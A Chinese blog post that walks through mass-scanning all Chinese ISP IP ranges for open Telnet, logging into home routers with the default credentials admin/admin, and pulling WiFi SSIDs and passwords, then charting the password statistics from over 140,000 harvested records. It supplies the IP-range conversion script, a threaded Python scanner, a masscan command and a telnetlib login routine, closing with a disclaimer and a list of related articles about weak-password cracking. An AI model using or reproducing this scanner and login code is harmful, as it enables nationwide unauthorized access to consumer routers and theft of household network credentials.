如何扫描统计全国Telnet默认口令

zrools2016-01-21共339474人围观 ,发现 23 个不明物体系统安全终端安全

本文原创作者:zrools

本文中介绍的工具、技术带有一定的攻击性,请合理合法使用。

0×00 前言

在日常工作中,我们经常会遇到针对全国甚至针对全网对某一漏洞/安全事件做数据统计分析。这时我们该怎么做呢?在本文中,我将用Telnet弱口令给大家做示范希,望能唤起相关人员的安全意识,以提高网络空间的安全防御能力!

talk is cheap show me the code!

You say a JB without pictures?

0×01 准备数据

运营商IP段
在国内某网下载了国内运营商IP段数据(IPv4)
数据处理
下载回来每个运营商为一个txt文件,数据格式如下

183.0.0.0       183.63.255.255  4194304
36.96.0.0       36.127.255.255  2097152
49.64.0.0       49.95.255.255   2097152
113.64.0.0      113.95.255.255  2097152
115.192.0.0     115.223.255.255 2097152
180.96.0.0      180.127.255.255 2097152
183.128.0.0     183.159.255.255 2097152
220.160.0.0     220.191.255.255 2097152
14.16.0.0       14.31.255.255   1048576
14.112.0.0      14.127.255.255  1048576

将所有IP段合并为一个文件

awk '{print $1,$2}' *.txt | sort | uniq > ip.txt

将IP范围转为IP/掩码格式,主要是为了方便扫描软件载入

import netaddr

with open("ip.txt", "r") as f:
    for line in f:
        ip = line.strip().split()  
        prx = netaddr.IPRange(ip[0],ip[1]).cidrs()[0].prefixlen
        print(ip[0]+'/'+str(prx))

转换后格式

101.0.0.0/22
1.0.1.0/24
101.1.0.0/22
101.101.100.0/24
101.101.102.0/23
101.101.104.0/21
101.101.112.0/20
101.101.64.0/19
101.102.100.0/23
101.102.102.0/24

0×02 扫描

以下python版本为3.4

python 512线程直扫上行带宽约几百KB/s;直接上masscan、zmap这等扫描软件上行流量会暴走;具体要多少时间,可以拿少量数据测试算算!
2.1 使用python
使用python直接将IP按组遍历进队列,使用多线程循环扫描(也就是直接尝试登录),速度比较慢,但准确率相对较高

nloops = 256
ipQue = queue.Queue()
with open("ip.txt", "r") as f:
    for line in f:
        for ip in IPNetwork(line.strip().split()).iter_hosts():
            ipQue.put(ip);         # 调用多线
        for i in range(nloops):
            t = threading.Thread(target=getwifi)  # getwifi 为任务方法
            t.start()
            threads.append(t)         # 等待一轮扫描结束
        for i in range(nloops):
            threads[i].join()         # 删掉已扫描的IP段,防止服务重启或中途断开重启动重复扫描
        os.system("sed -i '/"+line.strip()+"/d' ip.txt")

2.2 使用masscan
先扫描得到23端口IP,然后一次性扔python进行多线程尝试登录,速度快,准确率较低,大致使用如下,具体参数自己定

masscan -p23 `sed ':a;N;$!ba;s/\n/ /g' ip.txt` --banners -oB port.txt

2.3 Telnet
尝试登录部分,直接try…except,超时、登录、读取任意一处超时或异常直接扔掉这个IP,具体超时时间自己看网络情况定

try:
    t = telnetlib.Telnet(host, timeout=TIMEOUT)
    t.read_until(b"username:", TIMEOUT)
    t.write(b"admin\n")
    t.read_until(b"password:", TIMEOUT)
    t.write(b"admin\n")
    t.write(b"wlctl show\n")
    t.write(b"lan show info\n")     # 获取BSSID
    t.read_until(b"SSID", TIMEOUT)
    strx = t.read_very_eager().decode('ascii')
    t.close()
    # 如果能获取信息,这里写处理代码(比如去重复插入数据库),strx为输出内容
except:
    pass

2.4 IP信息
将存到数据库的记录循环抽取调用淘宝接口更新地区等信息

http://ip.taobao.com/service/getIpInfo.php?ip=1.1.1.1

0×03 统计

总共有多少IP没多记录,所以端口开放率及成功率没法去统计了
数据库是mysql后端php处理返回json,前端使用d3.js生成图表,数据表结构如下:

以上是去年测试的数据

一轮扫下来获取为wifi记录14W+,可从已扫描的有结果中提取IP处理成IP段继续扫描,效率会大大提高

以下是万恶的各种TOP
3.1 长度TOP
先来看看丧心病狂长度TOP10,请允许我打一下码:

3.2 频率最高的口令TOP
X标签没有那个是无口令

3.3 口令位数与出现频率关系
已去掉空口令统计,1~7位估计是口令中出现了变态字符导致截断了-_-#

3.4 运营商TOP
貌似加起来都不够10个 -_-#

3.5 省份TOP

3.6 城市TOP

看多了棒子图,看看其他图形展示

0×04 常见口令规则比例

将数据一次性提取遍历正则统计,规则按以下几项

- 空
- 纯数字(日期/生日-yyyymmdd & 手机号-11位 & 其他)
- 纯字符(纯小写 & 纯大写 & 其他)
- 混合型(含日期 & 含手机 & 其他)

鼠标经过颜色块,展示相应数据

4.1 所有城市展示
一次性将所有城市展示出来,使用鼠标滚轮方法缩小,左图为缩小图,右图为放大图 (全景图1全景图2

4.2 全国分布
最后来个千篇一律的全国分布图(鼠标经过展示数据)

暂时就这么多,有兴趣可以试试其他有趣的展现方式!

ps:以上仅供学习交流,乱搞造成一切后果与本人无关!

0×05 参考

- 具体python实现:http://92ez.com/?action=show&id=49

- wooyun:http://www.wooyun.org/bugs/wooyun-2013-026776

如何扫描统计全国Telnet默认口令的更多相关文章

  1. 漏洞利用 Exploit---利用默认口令、IP假冒、应用漏洞

    漏洞利用 编辑 讨论 本词条由“科普中国”科学百科词条编写与应用工作项目 审核 . 漏洞利用(英语:Exploit,本意为“利用”)是计算机安全术语,指的是利用程序中的某些漏洞,来得到计算机的控制权( ...

  2. Telnet弱口令猜解【Python脚本】

    telnet 弱口令猜解脚本 测试环境:window2003.centos7 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import telnetli ...

  3. 利用Axis2默认口令安全漏洞可入侵WebService网站

    利用Axis2默认口令安全漏洞可入侵WebService网站 近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基 ...

  4. Python Telnet弱口令爆破脚本及遇到的错误与问题

    写得时候遇到了一个很大的问题,就是我在发送用户名,接受用户名就会一直卡住.然后等了好久后提示 recv ‘\r\nSession timed out.\r\n\r\nTelnet Server has ...

  5. IPMI相关漏洞利用及WEB端默认口令登录漏洞

    IPMI相关漏洞 0套件漏洞 使用0套件时,只需要Username,口令任意即可绕过身份鉴别执行指令.而且一般还有一个默认的账户admin或者ADMIN. 备注:IPMI是一套主机远程管理系统,可以远 ...

  6. 利用Axis2默认口令安全漏洞入侵WebService网站

    近期,在黑吧安全网上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展.黑吧安全网Axis2默认口令 ...

  7. ctfhub技能树—密码口令—默认口令

    打开靶机 查看页面内容 根据题目提示,去搜索北京亿中邮信息技术有限公司邮件网关的默认口令 尝试登录 成功拿到flag

  8. Acunetix引入了Docker支持,扫描统计信息以及将漏洞发送到AWS WAF的功能

    已针对Windows,Linux和macOS发布了新的Acunetix更新:14.2.210503151. 此Acunetix更新引入了Docker支持,针对每次扫描显示的新"扫描统计信息& ...

  9. 自古逢秋悲寂寥,奈何今秋热成雕?Python使用Pyecharts统计全国温度Top10并绘图

    秋词-刘禹锡 自古逢秋悲寂寥, 我言秋日胜春朝. 晴空一鹤排云上, 便引诗情到碧霄. 古人谈及秋天,都是悲凉寂寥,那么-.我好想回到古代的秋天啊!明明到了秋天,为什么最近的气温比夏天还热. 之前做天气 ...

随机推荐

  1. <自动化测试>之<selenium API 查找元素操作底层方法>

    搜罗了一些查找元素的除标准语句外,另外的语句使用方法,摘自 开源中国 郝云鹏driver = webdriver.Chrome(); 打开测试页面 driver.get( "http://b ...

  2. ShellListView

    過濾ShellListView顯示的檔案 有關這方面的元件你可以在Win3.中找到相關元件 你可以使用四個元件搭配應該就可以你所需要的功能 DriveComboBox1.FilterComboBox1 ...

  3. WebView loadRequest请求错误"NSURLConnection finished with error - code -1022"

    执行下面代码 [self.webView loadRequest:[NSURLRequest requestWithURL:[NSURL URLWithString:@"http://www ...

  4. Eclipse ALT+/ 代码没有提示功能

    第一种配置如下: 第二: 第三: 以上三种方式是关于eclipse代码提示

  5. svm 之 线性可分支持向量机

    定义:给定线性可分训练数据集,通过间隔最大化或等价的求解凸二次规划问题学习获得分离超平面和分类决策函数,称为线性可分支持向量机. 目录: • 函数间隔 • 几何间隔 • 间隔最大化 • 对偶算法 1. ...

  6. 'pip' 不是内部或外部命令,也不是可运行的程序或批处理文件。

    解决方法: 本方法适用于已经成功安装python并配置了环境变量. 1.到官网下载pip.py文件 https://pypi.python.org/pypi/pip#downloads 点击下载,解压 ...

  7. PHP定时任务实现(计划任务 vs node.js)

    PHP自动任务(单线程) 一.计划任务实现 :最终需要在服务器(windows)上 设置计划任务 1.写好php任务文件 auto.php:链接数据库 判断条件操作数据库 2.创建bat文件 例:ru ...

  8. 二、检索语句 SELECT、ORDER BY、WHERE

    介绍如何使用SELECT语句从表中检索一个或多个数据列   第二章: SELECT语句 SQL语句可以在一行给出,也可以分成许多行,分成多行更容易调试. 多条SQL语句必须以分号 分隔.多数DBMS不 ...

  9. 【小程序】获取到的e.target与e.currentTarget区别

    [小程序]获取到的e.target与e.currentTarget区别:https://blog.csdn.net/qq_33744228/article/details/80310294 使用e.t ...

  10. Spring整合Hibernate报错:annotatedClasses is not writable or has an invalid setter method

    Spring 整合Hibernate时报错: org.springframework.beans.factory.BeanCreationException: Error creating bean ...